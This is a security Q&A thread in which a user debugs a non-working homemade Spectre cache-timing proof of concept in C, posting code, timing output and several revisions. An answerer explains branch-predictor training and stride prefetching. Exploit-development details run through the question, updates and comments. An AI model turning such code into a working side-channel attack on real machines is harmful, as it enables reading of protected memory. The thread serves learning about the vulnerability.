3

Inspired by this question and based on this:

Why does me unpatched sytsem *appear* to be not vulenrable by Spectre?

Figured out I will open a new question, instead of "polluting" somebody else question with questions.

I wrote this code:

It should speculatively load 'U' in the CPU Cache and later it is probed if it was found there, based on read timings.

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

#define CACHELINESIZE   4096
#define REP     100


void main(void)
{
    typedef char line[CACHELINESIZE];
    line A[512];

    // Initialise array to 'A'
    for(int i=0; i<512; i++)
    {
        for(int j=0; j<CACHELINESIZE; j++)
        {
            A[i][j]='A'; 
        }
    }


    // Flush address of i
    for (int i = 0; i < 512; i++)
    {
        _mm_clflush( & A[i]); /* intrinsic for clflush instruction */
    }

    char secret = 'U';
    char any = 'X';

    char* pcheck[REP];
    line* pwrite[REP];

    for(int i=0; i<REP; i++) {
        pcheck[i] = &any; 
        pwrite[i] = A; 
    }

    /*
    for(int i=0;i<REP;i++)
    {
        printf("pcheck: %c\n",*pcheck[i]);
        printf("pwrite: %s\n",*pwrite[i]);
    }
    */

    pcheck[REP-1] = &secret;
    pwrite[REP-1] = A+256;

    /*
    printf("pcheck:%c\n", *pcheck[REP-1]);
    printf("pwrite:%c\n", **pwrite[REP-1]);
    */

    char dummy;
    for(int i=0; i<REP; i++) {
        if (i != (REP-1)) {
            dummy = *pcheck[i];
        }
    }
    int t0,time_taken = 0;
    int junk = 0;

    char * val;
    int mix_i=0;

    int i,j;
    int aux,res;

    char RandomId[26];
    char ListId[26]={65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90};



    srand(time(NULL));

    for(i=0; i<26; i++)
    {
        res = rand() % 26;
        aux = ListId[res];

        if (ListId[res] != -1)
        {
            RandomId[i] = aux;
            ListId[res] = -1;
        }
        else
            i--;
    }


    for(i=0; i<26; i++)
    {
        t0 = __rdtscp(&junk); 
        val = &A[256+RandomId[i]];
        time_taken = __rdtscp(&junk) - t0;
        printf("trying: %c time: %i\n",RandomId[i],time_taken);

    }
}

Executing:

 ./spectre
trying: Z time: 103
trying: D time: 94
trying: A time: 95
trying: S time: 94
trying: W time: 93
trying: Y time: 98
trying: X time: 93
trying: N time: 94
trying: E time: 93
trying: H time: 93
trying: B time: 93
trying: O time: 93
trying: V time: 93
trying: L time: 93
trying: M time: 94
trying: G time: 93
trying: U time: 93
trying: Q time: 93
trying: I time: 93
trying: C time: 107
trying: R time: 94
trying: P time: 94
trying: T time: 93
trying: F time: 94
trying: K time: 324
trying: J time: 94

So I cannot precisely determine what is in the CPU Cache, since many have similar low values.

Is there anything wrong with this approach?

It woks flawlessy on my laptop with this version:

https://www.exploit-db.com/exploits/43427/

Anybody see difference between above and version in this post?

I compiled it without optimizations (gcc -O0)

I do speculatively load 'U'

I clear the Cache (clflush)

Later I measure the timings.

I ran it on one Core (taskset 0x1 ./spectre)

I also added load (stress -i NO_OF_CORES)

Ideas anybody?

Update 1:

I thought it will be speculatively loaded here:

/*

The if evaluates to true 99 times in a row  and then once to false. Thus I assume that in the last run,
branch prediction is fooled into speculatively executing (but later abandoning) the assignment.

*/ 
  if (i != (REP-1)) {
    dummy = *pcheck[i];
  }
}

So dummy will be assigned 'U', that means it should be in the CPU cache?

Update 2:

Should this be enough ? Is that what you mean?

char dummy = 0; //prevent optimization by compiler
for(int i=0; i<REP; i++) {
 if (i != (REP-1)) {
    dummy = *pcheck[i];
    A[256][256] = dummy;   
 }
}

Thanks,

Update 3:

Is this correct than?

for(int i=0; i<REP; i++) {
 if (i != (REP-1)) {
    dummy = *pcheck[i];
    A[256][i] = dummy;   
 }
}

Update 4:

Also shouldnt timing be done like this?

volatile uint8_t * addr;
  for(i=0; i<26; i++)
  {
    mix_i = RandomId[i];
    addr = &A[256][10+mix_i];
    t0 = __rdtscp(&junk); 
    junk = *addr;
    time_taken = __rdtscp(&junk) - t0;
    printf("trying: %c time: %i\n",RandomId[i],time_taken);
  }
}
dev
  • 937
  • 1
  • 8
  • 23
  • 1
    One potential is stride prediction. Note how in the example they deliberately randomize the access order. – Hector Jan 16 '18 at 20:50
  • 2
    I also can't see from a quick skim on mobile if you are adequately training the branch predictor. – Hector Jan 16 '18 at 20:52
  • Thanks! I tried to randomize access order and I think I train the branch predictor. Still learning this, including C/ASM and Spectre. Guidance and help is greatly appreciated! – dev Jan 16 '18 at 21:38
  • Unfortunately i'm on mobile. If i have a chance i'll take a proper look at the code in the morning (UK). – Hector Jan 16 '18 at 21:45
  • Great! The code could be messed up, just a friendly warning :) Would be great if you can explain stride prediction and training the branch concept. Would like to understand what I do wrong. – dev Jan 16 '18 at 22:48

1 Answers1

1

I don't have immediate access to an unpatched machine so the below is observations from the code. Some or all of it may be wrong! Also a heads up for anyone else trying this on a Windows machine - you need to increase the stack reserve limit!

The first potential issue I notice is

_mm_clflush( & A[i]); /* intrinsic for clflush instruction */

You are taking the address of A[i]. But A[i] is of type line - "char line[CACHELINESIZE]" which is already a pointer. So i'm not convinced you are flushing the correct address - i'd suggest trying "_mm_clflush(A[i])". Changing to this on a patched windows machine increases access times by ~80%.

Where do you load the page in A for U?. A is not touched other than pwrite it isn't used as far as I can see. And pwrite is not used anywhere other than where it is initialised.

There are still minor issues beyond that but I'd suggest fixing the two major problems above. If it still doesn't work let me know and i'll look further.

Would be great if you can explain stride prediction and training the branch concept.

Stride prediction is where the underlying system notices a pattern in the data you are requesting and prefetches it for you. The system here could be hardware, OS or compiler.

i.e. if you were doing -

for (auto i = 0; i < numPages; ++i) {
    DoSomethingWith(pages[i]);
}

The system might notice the pattern and make sure it already has pages[i] cached (prefetch) before you ask to use it. Since in this case we are attempting to manually control the cache contents we don't want the system to do this - so we want to avoid any patterns when accessing data in A.

Training the branch is attempting to control how the branch predictor behaves. In this case we want to make sure it assumes the "i != (REP-1)" is true branch every time - including the time when it isn't. So we need to repeat the same exercise where that does evaluate to true multiple times. We then need to ensure there are no obvious changes when the state turns to true to tip the branch predictor off ahead of time that it might be supposed to choose the other direction.

Hector
  • 10,893
  • 3
  • 41
  • 44
  • Thanks for your answer! I tried to flush A[i] instead, but results are similar. Tried on 2 unpatched kernels. Can you elaborate more on paragraph 4, in regards to loading the page in A for U. What should I try? Hope you have patience to explain it. – dev Jan 17 '18 at 09:56
  • FYI I tried also printf("%p\n",&A[i]); printf("%p\n",A[i]); in the flush for loop and both produce the same address – dev Jan 17 '18 at 10:08
  • @android_dev - you flush all of A out of memory. You are then supposed to speculatively load in a page. I.e. in the linked example "temp &= array2[array1[x] * 512];". I do not see anywhere where you are loading in a page from A speculatively? – Hector Jan 17 '18 at 10:16
  • Possibly I misunderstood it, but please see Update 1: – dev Jan 17 '18 at 10:25
  • dummy = *pcheck[i] = &secret. So yes you speculatively take the secret value 'U' - but you don't do anything with it. So no value in A is touched and none of it is cached. – Hector Jan 17 '18 at 10:44
  • Please see Update 2: Is that what you mean? – dev Jan 17 '18 at 11:20
  • @android_dev - no. A[256][256] = dummy; accesses the same part of A for all values. I think you need to re-read the spectre paper and the linked working example. – Hector Jan 17 '18 at 11:30
  • @android_dev - updated to explain the concepts you requested. – Hector Jan 17 '18 at 11:42
  • Thanks. That's great. I read the paper and sample exploit, but have hard time understanding several concepts, possibly to my knowhow and experience limitation. Hence this simpler variant and my SE question. If you have still patience and will, I made Update 3:. Is this now OK? Want to get it running ... but still no success. – dev Jan 17 '18 at 12:51
  • @android_dev - I think your array indexes would have to be the other way around. A is an array of pages. If you always access the same page/cache line nothing is going to get moved in/out. – Hector Jan 17 '18 at 14:02
  • Tried that. A[i][256] = *pcheck[i]; and also modified the reading as in Update 4: But still no precise values. If U was in the cache, why would other letters also have such a small access time? Practically all letters have access around 90 ... no big drop for U – dev Jan 17 '18 at 14:57
  • Code and execution log here: https://0bin.net/paste/S+crbNZ+WwaxtnyU#UXTMq1fMnwvx19-xt+O4fY3HAK/f0JzD0fkSNp2QOh9 Thanks! – dev Jan 17 '18 at 14:59
  • @android_dev - now you are accessing A[i][256] = *pcheck[i]; for all values of i. I'd imagine *pcheck[i] needs to be part of the first index. 90 cycles isn't fast - on my machine a cache hit is ~30 cycles. As above I think you're not going to get this working until you fully understand the theory / sample exploit. – Hector Jan 17 '18 at 15:24
  • Discussion with you help, paper not so much, hope you still have the patience. Discarded previous example, since I am not sure how to make it work. Tried with this one: https://0bin.net/paste/7EHh73AdG7WK9KA2#-SFfIFN9NU3H7tBitEIYvOzHb/lVMyYu22M/ObqmFqF based on the Paper exploit. BUT what is funny, I get higher time for cached character ... speculatively loaded. I use AMD processor. Does it make any sense? I tried with 2 characters Z and Y and it seems to be consistent across runs – dev Jan 17 '18 at 20:03
  • Here second version https://0bin.net/paste/AWO6y-cFpV1nnoxq#c6trCH7eqckBhIoXGJEJWuaQZplYTKJ9wn83N1qoBVF with rand to prevent stride prediction. Seems consistent ... but do you have explanation why it works like this? – dev Jan 17 '18 at 20:54
  • Opened another question for this: https://security.stackexchange.com/questions/177880/spectre-poc-paper-based-opposite-results – dev Jan 18 '18 at 08:59